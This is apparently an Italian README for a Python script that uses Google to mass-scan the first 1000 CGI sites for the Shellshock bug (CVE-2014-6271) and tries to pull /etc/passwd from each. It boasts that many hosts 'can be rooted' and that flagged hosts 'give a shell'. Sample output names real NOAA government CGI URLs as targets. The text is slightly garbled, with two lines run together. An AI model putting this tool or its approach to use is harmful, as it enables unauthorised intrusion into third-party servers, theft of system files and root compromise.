
Usando Google per scansionare siti alla ricerca di "ShellShock" (CVE-2014-6271)
sudo pip install shellUso Google per cercare i primi 1000 siti e provare a ottenere /etc/passwd.
Dopo i test, ci sono molti molti molti host che possono essere rootati!!!!
Tra l'altro, questo è solo un prototipo, ha falsi positivi.
Output simile a questo:
se il secondo campo è !!!, allora Puoi Ottenere SHELL!
$ python shellshock.py
0 --- http://nomad3.ncep.noaa.gov/cgi-bin/pdisp_sst.sh
1 --- http://nomad5.ncep.noaa.gov/cgi-bin/pdisp_gfs.sh?ctlfile=gfs_00z.ctl&povlp=noovlp&ptype=map&dir